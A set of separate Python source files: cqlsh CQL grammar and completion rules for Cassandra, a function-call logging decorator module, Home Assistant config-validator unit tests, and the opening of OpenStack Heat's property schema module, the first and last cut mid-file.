def create_cf_composite_primary_key_paren_completer(ctxt, cass):
    """Complete the opening paren of the PRIMARY KEY column list."""
    return ['(']
@completer_for('compositeKeyCfSpec', 'c')
def create_cf_composite_primary_key_comma_completer(ctxt, cass):
    """Offer ',' while declared columns remain for the primary key list."""
    declared = ctxt.get_binding('newcolname')
    used = ctxt.get_binding('pkey', ())
    return [','] if len(used) < len(declared) - 1 else ()
syntax_rules += r'''
<createIndexStatement> ::= "CREATE" "CUSTOM"? "INDEX" ("IF" "NOT" "EXISTS")? indexname=<identifier>? "ON"
cf=<columnFamilyName> "(" col=<cident> ")"
( "USING" <stringLiteral> ( "WITH" "OPTIONS" "=" <mapLiteral> )? )?
;
'''
explain_completion('createIndexStatement', 'indexname', '<new_index_name>')
@completer_for('createIndexStatement', 'col')
def create_index_col_completer(ctxt, cass):
    """Suggest columns of the target table that are not yet indexed."""
    layout = get_cf_layout(ctxt, cass)
    unindexed = [cd.name for cd in layout.columns if cd.index_name is None]
    return map(maybe_escape_name, unindexed)
syntax_rules += r'''
<dropKeyspaceStatement> ::= "DROP" "KEYSPACE" ("IF" "EXISTS")? ksname=<nonSystemKeyspaceName>
;
<dropColumnFamilyStatement> ::= "DROP" ( "COLUMNFAMILY" | "TABLE" ) ("IF" "EXISTS")? cf=<columnFamilyName>
;
<dropIndexStatement> ::= "DROP" "INDEX" ("IF" "EXISTS")? indexname=<identifier>
;
'''
@completer_for('dropIndexStatement', 'indexname')
def drop_index_completer(ctxt, cass):
    """Complete with the names of all existing indexes."""
    return map(maybe_escape_name, cass.get_index_names())
syntax_rules += r'''
<alterTableStatement> ::= "ALTER" wat=( "COLUMNFAMILY" | "TABLE" ) cf=<columnFamilyName>
<alterInstructions>
;
<alterInstructions> ::= "ALTER" existcol=<cident> "TYPE" <storageType>
| "ADD" newcol=<cident> <storageType> ("static")?
| "DROP" existcol=<cident>
| "WITH" <cfamProperty> ( "AND" <cfamProperty> )*
| "RENAME" existcol=<cident> "TO" newcol=<cident>
( "AND" existcol=<cident> "TO" newcol=<cident> )*
;
'''
@completer_for('alterInstructions', 'existcol')
def alter_table_col_completer(ctxt, cass):
    """Suggest existing column names of the table being altered."""
    layout = get_cf_layout(ctxt, cass)
    existing = [md.name for md in layout.columns]
    return map(maybe_escape_name, existing)
explain_completion('alterInstructions', 'newcol', '<new_column_name>')
syntax_rules += r'''
<alterKeyspaceStatement> ::= "ALTER" ( "KEYSPACE" | "SCHEMA" ) ks=<alterableKeyspaceName>
"WITH" <property> ( "AND" <property> )*
;
'''
syntax_rules += r'''
<username> ::= name=( <identifier> | <stringLiteral> )
;
<createUserStatement> ::= "CREATE" "USER" <username>
( "WITH" "PASSWORD" <stringLiteral> )?
( "SUPERUSER" | "NOSUPERUSER" )?
;
<alterUserStatement> ::= "ALTER" "USER" <username>
( "WITH" "PASSWORD" <stringLiteral> )?
( "SUPERUSER" | "NOSUPERUSER" )?
;
<dropUserStatement> ::= "DROP" "USER" <username>
;
<listUsersStatement> ::= "LIST" "USERS"
;
'''
syntax_rules += r'''
<grantStatement> ::= "GRANT" <permissionExpr> "ON" <resource> "TO" <username>
;
<revokeStatement> ::= "REVOKE" <permissionExpr> "ON" <resource> "FROM" <username>
;
<listPermissionsStatement> ::= "LIST" <permissionExpr>
( "ON" <resource> )? ( "OF" <username> )? "NORECURSIVE"?
;
<permission> ::= "AUTHORIZE"
| "CREATE"
| "ALTER"
| "DROP"
| "SELECT"
| "MODIFY"
;
<permissionExpr> ::= ( <permission> "PERMISSION"? )
| ( "ALL" "PERMISSIONS"? )
;
<resource> ::= <dataResource>
;
<dataResource> ::= ( "ALL" "KEYSPACES" )
| ( "KEYSPACE" <keyspaceName> )
| ( "TABLE"? <columnFamilyName> )
;
'''
@completer_for('username', 'name')
def username_name_completer(ctxt, cass):
    """Complete usernames by querying LIST USERS (except for CREATE USER,
    where the name is by definition new)."""
    def maybe_quote(name):
        # quote names that are not valid bare CQL3 identifiers
        if CqlRuleSet.is_valid_cql3_name(name):
            return name
        return "'%s'" % name

    # disable completion for CREATE USER.
    if ctxt.matched[0][0] == 'K_CREATE':
        return [Hint('<username>')]

    # NOTE(review): the cursor is never closed/released here — TODO confirm
    # whether the driver reclaims it automatically.
    cursor = cass.conn.cursor()
    cursor.execute("LIST USERS")
    return [maybe_quote(row[0].replace("'", "''")) for row in cursor.fetchall()]
# END SYNTAX/COMPLETION RULE DEFINITIONS
# Register the grammar accumulated above with the shared CQL rule set.
CqlRuleSet.append_rules(syntax_rules)
class CqlColumnDef:
    """One column of a table, as reconstructed from the system schema."""
    index_name = None
    index_type = None
    # component_type distinguishes key components from regular/static columns
    component_type = 'regular'
    component_index = None
    # NOTE(review): class-level mutable default; from_layout rebinds (never
    # mutates) it, so instances without a CUSTOM index share this one dict.
    index_options = {}
    def __init__(self, name, cqltype):
        self.name = name
        self.cqltype = cqltype
        assert name is not None
    @classmethod
    def from_layout(cls, layout):
        """Build a CqlColumnDef from one row of system.schema_columns."""
        c = cls(layout[u'column_name'], lookup_casstype(layout[u'validator']))
        c.component_type = layout[u'type']
        idx = layout[u'component_index'] # can be None
        if idx:
            c.component_index = int(idx)
        c.index_name = layout[u'index_name']
        c.index_type = layout[u'index_type']
        if c.index_type == 'CUSTOM':
            # CUSTOM indexes carry JSON-encoded options
            c.index_options = json.loads(layout[u'index_options'])
        return c
    def is_static(self):
        """True when this column was declared 'static'."""
        return self.component_type == 'static'
    def __str__(self):
        indexstr = ' (index %s)' % self.index_name if self.index_name is not None else ''
        return '<CqlColumnDef %r %r%s>' % (self.name, self.cqltype, indexstr)
    __repr__ = __str__
class CqlTableDef:
    # NOTE(review): only the first string below becomes the class __doc__;
    # the rest serve as labels for the attributes that follow them.
    """Names of all columns which are grouped into the partition key"""
    partition_key_columns = ()
    """Names of all columns which are part of the primary key, but not grouped
    into the partition key"""
    clustering_key_columns = ()
    """Names of all columns which are part of the primary key, whether or not
    they are grouped into the partition key"""
    primary_key_columns = ()
    """Names of all columns which aren't part of the primary key"""
    regular_columns = ()
    """CqlColumnDef objects for all columns. Use .get_column() to access one
    by name."""
    columns = ()
    def __init__(self, name):
        self.name = name
    @classmethod
    def from_layout(cls, layout, coldefs):
        """
        This constructor accepts a dictionary of column-value pairs from a row
        of system.schema_columnfamilies, and a sequence of similar dictionaries
        from corresponding rows in system.schema_columns.
        """
        cf = cls(name=layout[u'columnfamily_name'])
        cf.keyspace = layout[u'keyspace_name']
        # copy every schema column of the row onto the instance
        for attr, val in layout.items():
            setattr(cf, attr.encode('ascii'), val)
        cf.comparator = lookup_casstype(cf.comparator)
        for attr in ('compaction_strategy_options', 'compression_parameters'):
            setattr(cf, attr, json.loads(getattr(cf, attr)))
        # deal with columns, filter out empty column names (see CASSANDRA-6139)
        # NOTE: Python 2 — map()/filter() return lists; .sort() and '+' below
        # rely on that.
        columns = filter(lambda c: c.name, map(CqlColumnDef.from_layout, coldefs))
        partition_key_cols = filter(lambda c: c.component_type == u'partition_key', columns)
        partition_key_cols.sort(key=lambda c: c.component_index)
        cf.partition_key_columns = map(lambda c: c.name, partition_key_cols)
        clustering_key_cols = filter(lambda c: c.component_type == u'clustering_key', columns)
        clustering_key_cols.sort(key=lambda c: c.component_index)
        cf.clustering_key_columns = map(lambda c: c.name, clustering_key_cols)
        cf.primary_key_columns = cf.partition_key_columns + cf.clustering_key_columns
        regular_cols = list(set(columns) - set(partition_key_cols) - set(clustering_key_cols))
        regular_cols.sort(key=lambda c: c.name)
        cf.regular_columns = map(lambda c: c.name, regular_cols)
        cf.columns = partition_key_cols + clustering_key_cols + regular_cols
        return cf
    # not perfect, but good enough; please read CFDefinition constructor comments
    # returns False if we are dealing with a CQL3 table, True otherwise.
    # 'compact' here means 'needs WITH COMPACT STORAGE option for CREATE TABLE in CQL3'.
    def is_compact_storage(self):
        if not issubclass(self.comparator, CompositeType):
            return True
        for subtype in self.comparator.subtypes:
            if issubclass(subtype, ColumnToCollectionType):
                return False
        if len(self.clustering_key_columns) == len(self.comparator.subtypes) - 1:
            if self.comparator.subtypes[-1] is UTF8Type:
                return False
        return True
    def is_counter_col(self, colname):
        """True when *colname* exists and is a counter column."""
        try:
            return bool(self.get_column(colname).cqltype is CounterColumnType)
        except KeyError:
            return False
    def get_column(self, colname):
        """Return the CqlColumnDef named *colname*; raise KeyError if absent."""
        col_info = [cm for cm in self.columns if cm.name == colname]
        if not col_info:
            raise KeyError("column %r not found" % (colname,))
        return col_info[0]
    def __str__(self):
        return '<%s %s.%s>' % (self.__class__.__name__, self.keyspace, self.name)
    __repr__ = __str__
| |
#!/usr/bin/env python
# coding=utf-8
import re
import inspect
import types
import log
# Module-level memo cache used by __function_has_return_statement.
# key: function, value: boolean -- has return statement?
__has_return_statement = {}
def __function_has_return_statement(function):
    """Helper function, checks if a function given as a parameter
    has a return statement. Returns boolean.

    Source-level heuristic: looks for a 'return' token preceded by
    start-of-line, whitespace or ':' (one-line defs).  It can still be
    fooled by 'return' inside strings or comments.  Results are memoized
    in the module-level __has_return_statement dict.
    """
    if function not in __has_return_statement:
        # BUG FIX: the old pattern only accepted a literal space before
        # 'return', missing tab-indented source; \b after it also accepts
        # forms like 'return[' while still rejecting e.g. 'returns'.
        pattern = re.compile(r'(^|\s|:)return\b')
        source_lines = inspect.getsource(function).split('\n')
        # any() works on both Python 2 and 3 (len(filter(...)) is 2-only)
        __has_return_statement[function] = any(
            pattern.search(line) for line in source_lines)
    return __has_return_statement[function]
def __get_function_parameters(function, *args, **kwargs):
    """Helper function, returns a list of (name, value) tuples describing
    the parameters of *function* as called with *args*/*kwargs*.

    Positional arguments beyond the declared parameters are reported under
    the name '?'.  Parameters that were neither passed nor defaulted are
    reported with value None.
    """
    # Get names and default arguments
    # (inspect.getargspec is kept for Python 2 compatibility)
    fargspec = inspect.getargspec(function)
    arglist = dict((name, None) for name in fargspec.args)
    if fargspec.defaults:
        # BUG FIX: defaults belong to the *last* len(defaults) declared
        # parameters; the old code zipped them against the first ones,
        # attaching default values to the wrong parameters.
        defaulted_names = fargspec.args[-len(fargspec.defaults):]
        for name, default in zip(defaulted_names, fargspec.defaults):
            arglist[name] = default
    # Get argument values passed to the function
    unnamed = []
    for i, value in enumerate(args):
        try:
            arglist[fargspec.args[i]] = value
        except IndexError:
            unnamed.append(value)
    for name, value in kwargs.items():
        arglist[name] = value
    # Create final list of all arguments and their values
    farglist = [(name, value) for name, value in arglist.items()]
    farglist.extend(('?', value) for value in unnamed)
    return farglist
def __format_value(value):
    """Render a parameter value for logging: strings are flattened onto a
    single line and single-quoted; everything else is returned unchanged."""
    # NOTE: 'basestring' makes this module Python-2-only.
    if isinstance(value, basestring):
        value = re.sub(r'\r\n', ' ', value)
        value = re.sub(r'\n', ' ', value)
        value = "'%s'" % value
    return value
def footprint(function):
    """Decorator logging function's params and return value.

    Emits a 'CALL module.[class.]name (arg = value, ...)' header, indents
    the log while the wrapped function runs, then emits an 'END name'
    footer (with the return value when the source contains a 'return').
    """
    # Make sure that passed argument is a function
    assert inspect.isfunction(function), 'Cannot decorate: not a function!'
    def function_wrapper(*args, **kwargs):
        # Get function arguments and their values
        farglist = __get_function_parameters(function, *args, **kwargs)
        # Print the header: what function was called
        # and what argument values were passed
        fargdict = dict(farglist)
        if 'self' in fargdict:
            # instance method: qualify with the runtime class of 'self'
            call_str = 'CALL %s.%s.%s (' % (function.__module__,
                                            fargdict['self'].__class__.__name__,
                                            function.__name__)
        elif 'cls' in fargdict:
            # classmethod-style: qualify with the class object itself
            call_str = 'CALL %s.%s.%s (' % (function.__module__,
                                            fargdict['cls'].__name__,
                                            function.__name__)
        else:
            call_str = 'CALL %s.%s (' % (function.__module__,
                                         function.__name__)
        if not farglist:
            log.info('%s)' % call_str)
        elif len(farglist) == 1:
            log.info('%s%s = %s)' % (call_str,
                                     farglist[0][0],
                                     __format_value(farglist[0][1])))
        else:
            # align continuation lines under the opening parenthesis
            indent = ' ' * len(call_str)
            # First parameter
            log.info('%s%s = %s' % (call_str,
                                    farglist[0][0],
                                    __format_value(farglist[0][1])))
            # [1:-1] parameters
            for name, value in farglist[1:-1]:
                log.info('%s%s = %s' % (indent, name,
                                        __format_value(value)))
            # Last parameters
            log.info('%s%s = %s)' % (indent,
                                     farglist[-1][0],
                                     __format_value(farglist[-1][1])))
        log.indent()
        # Invoke the functions
        result = function(*args, **kwargs)
        # Print footer and the return value (if present)
        if __function_has_return_statement(function):
            log.info('END %s -> %s' % (function.__name__,
                                       __format_value(result)))
        else:
            log.info('END %s' % function.__name__)
        log.unindent()
        # Return function result
        return result
    return function_wrapper
def assert_not_none(function):
    """Decorator asserting a function's return value is not None.

    Raises AssertionError (naming the wrapped function) whenever the
    wrapped callable returns None; otherwise passes the result through.
    """
    import functools  # local import keeps this fix self-contained

    # functools.wraps preserves __name__/__doc__ on the wrapper so stacked
    # decorators and log output report the real function name.
    @functools.wraps(function)
    def function_wrapper(*args, **kwargs):
        result = function(*args, **kwargs)
        assert result is not None, 'Function %s output is None!' % function.__name__
        return result
    return function_wrapper
# Auto decoration flag
# Attribute name used to opt a function out of metaclass auto-decoration.
DO_NOT_DECORATE_FLAG = '__do_not_decorate'
def disable_auto_decoration(function):
    """Set a DO_NOT_DECORATE flag to a function.

    Usable as a decorator itself; returns the function unchanged apart
    from the marker attribute.
    """
    setattr(function, DO_NOT_DECORATE_FLAG, True)
    return function
def auto_decoration_enabled(function):
    """Check if auto-decoration is not disabled for a function."""
    if not inspect.isfunction(function):
        return False
    return not hasattr(function, DO_NOT_DECORATE_FLAG)
class _DecorateAllMethods(type):
    """Metaclass decorating all methods within a class that's using it."""
    # Name of a module-level decorator to apply; looked up via globals()
    # so subclasses can select it with a plain string.
    _decorator_name = None
    # Attribute names that must never be decorated.
    _disable = []
    def __new__(mcs, name, bases, local):
        assert mcs._decorator_name in globals()
        decorator = globals()[mcs._decorator_name]
        # wrap every eligible function attribute before the class is created
        for attr_name, attr_value in local.items():
            if attr_name in mcs._disable:
                continue
            if not auto_decoration_enabled(attr_value):
                continue
            local[attr_name] = decorator(attr_value)
        return super(_DecorateAllMethods, mcs).__new__(mcs, name, bases, local)
class FootprintAllMethods(_DecorateAllMethods):
    """Metaclass decorating all methods with a footprint decorator."""
    _decorator_name = 'footprint'
    # repr/str are excluded: footprint formatting would recurse through them
    _disable = ['__repr__', '__str__']
#def register_footprint(global_items):
# """Highly experimental."""
#
# for name, value in global_items.items():
# if isinstance(value, types.FunctionType):
# print '%s is a function type' % name
class footprintcls(object):
    """A decorator for classes. In case your class has already a metaclass."""
    def __init__(self, decorator=None):
        # default to the footprint logging decorator
        self.decorator = decorator or footprint
    def __call__(self, cls):
        skip = FootprintAllMethods._disable
        for attr_name, attr_value in cls.__dict__.items():
            if attr_name in skip:
                continue
            if auto_decoration_enabled(attr_value):
                setattr(cls, attr_name, self.decorator(attr_value))
        return cls
| |
"""Test config validators."""
from collections import OrderedDict
from datetime import timedelta, datetime, date
import enum
import os
from socket import _GLOBAL_DEFAULT_TIMEOUT
from unittest.mock import Mock, patch
import pytest
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from tests.common import get_test_home_assistant
def test_boolean():
    """Test boolean validation."""
    schema = vol.Schema(cv.boolean)
    invalid_values = ('T', 'negative', 'lock')
    truthy_values = ('true', 'On', '1', 'YES', 'enable', 1, True)
    falsy_values = ('false', 'Off', '0', 'NO', 'disable', 0, False)
    for value in invalid_values:
        with pytest.raises(vol.MultipleInvalid):
            schema(value)
    for value in truthy_values:
        assert schema(value)
    for value in falsy_values:
        assert not schema(value)
def test_latitude():
    """Test latitude validation."""
    schema = vol.Schema(cv.latitude)
    invalid_values = ('invalid', None, -91, 91, '-91', '91', '123.01A')
    for value in invalid_values:
        with pytest.raises(vol.MultipleInvalid):
            schema(value)
    valid_values = ('-89', 89, '12.34')
    for value in valid_values:
        schema(value)
def test_longitude():
    """Test longitude validation."""
    schema = vol.Schema(cv.longitude)
    invalid_values = ('invalid', None, -181, 181, '-181', '181', '123.01A')
    for value in invalid_values:
        with pytest.raises(vol.MultipleInvalid):
            schema(value)
    valid_values = ('-179', 179, '12.34')
    for value in valid_values:
        schema(value)
def test_port():
    """Test TCP/UDP network port."""
    schema = vol.Schema(cv.port)
    invalid_values = ('invalid', None, -1, 0, 80000, '81000')
    for value in invalid_values:
        with pytest.raises(vol.MultipleInvalid):
            schema(value)
    valid_values = ('1000', 21, 24574)
    for value in valid_values:
        schema(value)
def test_isfile():
    """Validate that the value is an existing file."""
    schema = vol.Schema(cv.isfile)
    fake_file = 'this-file-does-not.exist'
    assert not os.path.isfile(fake_file)
    invalid_values = ('invalid', None, -1, 0, 80000, fake_file)
    for value in invalid_values:
        with pytest.raises(vol.Invalid):
            schema(value)
    # patching methods that allow us to fake a file existing
    # with write access
    with patch('os.path.isfile', Mock(return_value=True)), \
            patch('os.access', Mock(return_value=True)):
        schema('test.txt')
def test_url():
    """Test URL."""
    schema = vol.Schema(cv.url)
    invalid_values = ('invalid', None, 100, 'htp://ha.io', 'http//ha.io',
                      'http://??,**', 'https://??,**')
    for value in invalid_values:
        with pytest.raises(vol.MultipleInvalid):
            schema(value)
    valid_values = ('http://localhost', 'https://localhost/test/index.html',
                    'http://home-assistant.io', 'http://home-assistant.io/test/',
                    'https://community.home-assistant.io/')
    for value in valid_values:
        assert schema(value)
def test_platform_config():
    """Test platform config validation."""
    bad_options = (
        {},
        {'hello': 'world'},
    )
    for value in bad_options:
        with pytest.raises(vol.MultipleInvalid):
            cv.PLATFORM_SCHEMA(value)
    good_options = (
        {'platform': 'mqtt'},
        {'platform': 'mqtt', 'beer': 'yes'},
    )
    for value in good_options:
        cv.PLATFORM_SCHEMA(value)
def test_ensure_list():
    """Test ensure_list."""
    schema = vol.Schema(cv.ensure_list)
    cases = (
        (None, []),
        (1, [1]),
        ([1], [1]),
        ('1', ['1']),
        (['1'], ['1']),
        ({'1': '2'}, [{'1': '2'}]),
    )
    for value, expected in cases:
        assert schema(value) == expected
def test_entity_id():
    """Test entity ID validation."""
    schema = vol.Schema(cv.entity_id)
    with pytest.raises(vol.MultipleInvalid):
        schema('invalid_entity')
    # entity IDs are normalized to lower case
    assert 'sensor.light' == schema('sensor.LIGHT')
def test_entity_ids():
    """Test entity ID validation."""
    schema = vol.Schema(cv.entity_ids)
    invalid = (
        'invalid_entity',
        'sensor.light,sensor_invalid',
        ['invalid_entity'],
        ['sensor.light', 'sensor_invalid'],
        ['sensor.light,sensor_invalid'],
    )
    for value in invalid:
        with pytest.raises(vol.MultipleInvalid):
            schema(value)
    for value in ([], ['sensor.light'], 'sensor.light'):
        schema(value)
    # Comma-separated strings are split, stripped and lower-cased.
    assert schema('sensor.LIGHT, light.kitchen ') == [
        'sensor.light', 'light.kitchen'
    ]
def test_event_schema():
    """Test event_schema validation."""
    invalid_options = (
        {}, None,
        {'event_data': {}},
        {'event': 'state_changed', 'event_data': 1},
    )
    for value in invalid_options:
        with pytest.raises(vol.MultipleInvalid):
            cv.EVENT_SCHEMA(value)
    valid_options = (
        {'event': 'state_changed'},
        {'event': 'state_changed', 'event_data': {'hello': 'world'}},
    )
    for value in valid_options:
        cv.EVENT_SCHEMA(value)
def test_platform_validator():
    """Test platform validation."""
    hass = get_test_home_assistant()
    try:
        schema = vol.Schema(cv.platform_validator('light'))
        with pytest.raises(vol.MultipleInvalid):
            schema('platform_that_does_not_exist')
        schema('hue')
    finally:
        # Always release the test instance, even on assertion failure.
        hass.stop()
def test_icon():
    """Test icon validation."""
    schema = vol.Schema(cv.icon)
    # 'icon:work' is rejected while 'mdi:work' passes.
    for bad in (False, 'work', 'icon:work'):
        with pytest.raises(vol.MultipleInvalid):
            schema(bad)
    schema('mdi:work')
def test_time_period():
    """Test time_period validation."""
    schema = vol.Schema(cv.time_period)
    invalid = (
        None, '', 'hello:world', '12:', '12:34:56:78',
        {}, {'wrong_key': -10}
    )
    for value in invalid:
        with pytest.raises(vol.MultipleInvalid):
            schema(value)
    valid = (
        '8:20', '23:59', '-8:20', '-23:59:59', '-48:00', {'minutes': 5}, 1, '5'
    )
    for value in valid:
        schema(value)
    # Bare numbers are seconds; 'HH:MM' strings may carry a leading minus.
    assert schema('180') == timedelta(seconds=180)
    assert schema('23:59') == timedelta(hours=23, minutes=59)
    assert schema('-1:15') == -1 * timedelta(hours=1, minutes=15)
def test_service():
    """Test service validation."""
    # Services must be of the form '<domain>.<service>'.
    validate = vol.Schema(cv.service)
    with pytest.raises(vol.MultipleInvalid):
        validate('invalid_turn_on')
    validate('homeassistant.turn_on')
def test_service_schema():
    """Test service_schema validation."""
    invalid_configs = (
        {}, None,
        # rejected: 'service' together with 'service_template'
        {
            'service': 'homeassistant.turn_on',
            'service_template': 'homeassistant.turn_on'
        },
        # rejected: data without a service to call
        {'data': {'entity_id': 'light.kitchen'}},
        # rejected: data must be a mapping
        {'service': 'homeassistant.turn_on', 'data': None},
        # rejected: unterminated template in data_template
        {
            'service': 'homeassistant.turn_on',
            'data_template': {'brightness': '{{ no_end'}
        },
    )
    for config in invalid_configs:
        with pytest.raises(vol.MultipleInvalid):
            cv.SERVICE_SCHEMA(config)
    valid_configs = (
        {'service': 'homeassistant.turn_on'},
        {'service': 'homeassistant.turn_on', 'entity_id': 'light.kitchen'},
        {
            'service': 'homeassistant.turn_on',
            'entity_id': ['light.kitchen', 'light.ceiling'],
        },
    )
    for config in valid_configs:
        cv.SERVICE_SCHEMA(config)
def test_slug():
    """Test slug validation."""
    schema = vol.Schema(cv.slug)
    for bad in (None, 'hello world'):
        with pytest.raises(vol.MultipleInvalid):
            schema(bad)
    # Plain words pass; integers are accepted as well.
    for good in (12345, 'hello'):
        schema(good)
def test_string():
    """Test string validation."""
    validate = vol.Schema(cv.string)
    with pytest.raises(vol.MultipleInvalid):
        validate(None)
    # Booleans and numbers are accepted alongside real strings.
    for value in (True, 1, 'hello'):
        validate(value)
def test_temperature_unit():
    """Test temperature unit validation."""
    validate = vol.Schema(cv.temperature_unit)
    # 'K' is rejected; 'C' and 'F' pass.
    with pytest.raises(vol.MultipleInvalid):
        validate('K')
    validate('C')
    validate('F')
def test_x10_address():
    """Test x10 addr validator."""
    schema = vol.Schema(cv.x10_address)
    # Each invalid address gets its own raises-block. Previously all three
    # invalid calls shared a single pytest.raises block, so the calls after
    # the first raise were never executed (dead assertions).
    for value in ('Q1', 'q55', 'garbage_addr'):
        with pytest.raises(vol.Invalid):
            schema(value)
    schema('a1')
    schema('C11')
def test_template():
    """Test template validator."""
    schema = vol.Schema(cv.template)
    # NOTE: pytest.raises() no longer accepts a ``message`` argument (it was
    # deprecated in pytest 4.1 and removed in 5.0), so rely on the default
    # failure report instead of a custom message per value.
    for value in (None, '{{ partial_print }', '{% if True %}Hello', ['test']):
        with pytest.raises(vol.Invalid):
            schema(value)
    options = (
        1, 'Hello',
        '{{ beer }}',
        '{% if 1 == 1 %}Hello{% else %}World{% endif %}',
    )
    for value in options:
        schema(value)
def test_template_complex():
    """Test template_complex validator."""
    schema = vol.Schema(cv.template_complex)
    for bad in (None, '{{ partial_print }', '{% if True %}Hello'):
        with pytest.raises(vol.MultipleInvalid):
            schema(bad)
    good = (
        1, 'Hello',
        '{{ beer }}',
        '{% if 1 == 1 %}Hello{% else %}World{% endif %}',
        # containers are validated recursively
        {'test': 1, 'test2': '{{ beer }}'},
        ['{{ beer }}', 1]
    )
    for value in good:
        schema(value)
def test_time_zone():
    """Test time zone validation."""
    validate = vol.Schema(cv.time_zone)
    # Unknown zone names are rejected; real IANA names and UTC pass.
    with pytest.raises(vol.MultipleInvalid):
        validate('America/Do_Not_Exist')
    validate('America/Los_Angeles')
    validate('UTC')
def test_datetime():
    """Test date time validation."""
    schema = vol.Schema(cv.datetime)
    # Bare dates, free text and date-only strings are rejected.
    for value in (date.today(), 'Wrong DateTime', '2016-11-23'):
        with pytest.raises(vol.MultipleInvalid):
            schema(value)
    schema(datetime.now())
    schema('2016-11-23T18:59:08')
def test_key_dependency():
    """Test key_dependency validator."""
    schema = vol.Schema(cv.key_dependency('beer', 'soda'))
    # BUG FIX: the single-element "tuple" was written as ({'beer': None})
    # without a trailing comma, so it was just a dict and the loop iterated
    # over its keys (the string 'beer') instead of over config mappings.
    options = (
        {'beer': None},
    )
    for value in options:
        with pytest.raises(vol.MultipleInvalid):
            schema(value)
    options = (
        {'beer': None, 'soda': None},
        {'soda': None}, {}
    )
    for value in options:
        schema(value)
def test_has_at_least_one_key():
    """Test has_at_least_one_key validator."""
    schema = vol.Schema(cv.has_at_least_one_key('beer', 'soda'))
    invalid = (None, [], {}, {'wine': None})
    for value in invalid:
        with pytest.raises(vol.MultipleInvalid):
            schema(value)
    # Either key alone satisfies the validator.
    for value in ({'beer': None}, {'soda': None}):
        schema(value)
def test_ordered_dict_order():
    """Test ordered_dict validator."""
    schema = vol.Schema(cv.ordered_dict(int, cv.string))
    val = OrderedDict([('first', 1), ('second', 2)])
    validated = schema(val)
    assert isinstance(validated, OrderedDict)
    # Key order must survive validation.
    assert list(validated.keys()) == ['first', 'second']
def test_ordered_dict_key_validator():
    """Test ordered_dict key validator."""
    # Keys validated as strings.
    str_keys = vol.Schema(cv.ordered_dict(cv.match_all, cv.string))
    with pytest.raises(vol.Invalid):
        str_keys({None: 1})
    str_keys({'hello': 'world'})
    # Keys validated as integers.
    int_keys = vol.Schema(cv.ordered_dict(cv.match_all, int))
    with pytest.raises(vol.Invalid):
        int_keys({'hello': 1})
    int_keys({1: 'works'})
def test_ordered_dict_value_validator():  # pylint: disable=invalid-name
    """Test ordered_dict validator."""
    # Values validated as strings.
    str_values = vol.Schema(cv.ordered_dict(cv.string))
    with pytest.raises(vol.Invalid):
        str_values({'hello': None})
    str_values({'hello': 'world'})
    # Values validated as integers.
    int_values = vol.Schema(cv.ordered_dict(int))
    with pytest.raises(vol.Invalid):
        int_values({'hello': 'world'})
    int_values({'hello': 5})
def test_enum():
    """Test enum validator."""
    class TestEnum(enum.Enum):
        """Test enum."""

        # Member names differ from their string values on purpose, so the
        # validator must match on names/members rather than raw values.
        value1 = "Value 1"
        value2 = "Value 2"

    schema = vol.Schema(cv.enum(TestEnum))
    # A name that is not a member must be rejected.
    with pytest.raises(vol.Invalid):
        schema('value3')
def test_socket_timeout():  # pylint: disable=invalid-name
    """Test socket timeout validator."""
    TEST_CONF_TIMEOUT = 'timeout'  # pylint: disable=invalid-name
    schema = vol.Schema(
        {vol.Required(TEST_CONF_TIMEOUT, default=None): cv.socket_timeout})
    # Zero and negative timeouts are rejected.
    for bad in (0.0, -1):
        with pytest.raises(vol.Invalid):
            schema({TEST_CONF_TIMEOUT: bad})
    # None falls back to the global socket default; ints coerce to float.
    result = schema({TEST_CONF_TIMEOUT: None})
    assert result[TEST_CONF_TIMEOUT] == _GLOBAL_DEFAULT_TIMEOUT
    assert schema({TEST_CONF_TIMEOUT: 1})[TEST_CONF_TIMEOUT] == 1.0
| |
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from oslo_serialization import jsonutils
import six
from heat.common import exception
from heat.common.i18n import _
from heat.engine import constraints as constr
from heat.engine import function
from heat.engine.hot import parameters as hot_param
from heat.engine import parameters
from heat.engine import support
# Legacy (cfn-style) property schema keys. The chained tuple-unpacking idiom
# binds each symbolic name (REQUIRED, DEFAULT, ...) to its string form while
# also collecting all of them in SCHEMA_KEYS for membership checks.
SCHEMA_KEYS = (
    REQUIRED, IMPLEMENTED, DEFAULT, TYPE, SCHEMA,
    ALLOWED_PATTERN, MIN_VALUE, MAX_VALUE, ALLOWED_VALUES,
    MIN_LENGTH, MAX_LENGTH, DESCRIPTION, UPDATE_ALLOWED,
    IMMUTABLE,
) = (
    'Required', 'Implemented', 'Default', 'Type', 'Schema',
    'AllowedPattern', 'MinValue', 'MaxValue', 'AllowedValues',
    'MinLength', 'MaxLength', 'Description', 'UpdateAllowed',
    'Immutable',
)
class Schema(constr.Schema):
    """
    Schema class for validating resource properties.

    This class is used for defining schema constraints for resource properties.
    It inherits generic validation features from the base Schema class and add
    processing that is specific to resource properties.
    """

    # Modern (HOT-style) schema keys, bound via the same tuple-unpacking
    # idiom as the module-level SCHEMA_KEYS.
    KEYS = (
        TYPE, DESCRIPTION, DEFAULT, SCHEMA, REQUIRED, CONSTRAINTS,
        UPDATE_ALLOWED, IMMUTABLE,
    ) = (
        'type', 'description', 'default', 'schema', 'required', 'constraints',
        'update_allowed', 'immutable',
    )

    def __init__(self, data_type, description=None,
                 default=None, schema=None,
                 required=False, constraints=None,
                 implemented=True,
                 update_allowed=False,
                 immutable=False,
                 support_status=support.SupportStatus(),
                 allow_conversion=False):
        # NOTE(review): support_status defaults to a single SupportStatus()
        # instance created at class-definition time and shared by every
        # Schema that does not pass one explicitly — assumed to be treated
        # as read-only; confirm before mutating it anywhere.
        super(Schema, self).__init__(data_type, description, default,
                                     schema, required, constraints)
        self.implemented = implemented
        self.update_allowed = update_allowed
        self.immutable = immutable
        self.support_status = support_status
        # allow_conversion relaxes Map-type coercion for values coming from
        # Json parameters (see Property._get_map).
        self.allow_conversion = allow_conversion
        # validate structural correctness of schema itself
        self.validate()

    @classmethod
    def from_legacy(cls, schema_dict):
        """
        Return a Property Schema object from a legacy schema dictionary.
        """
        # Check for fully-fledged Schema objects
        if isinstance(schema_dict, cls):
            return schema_dict

        # Reject keys that are not part of the legacy key set.
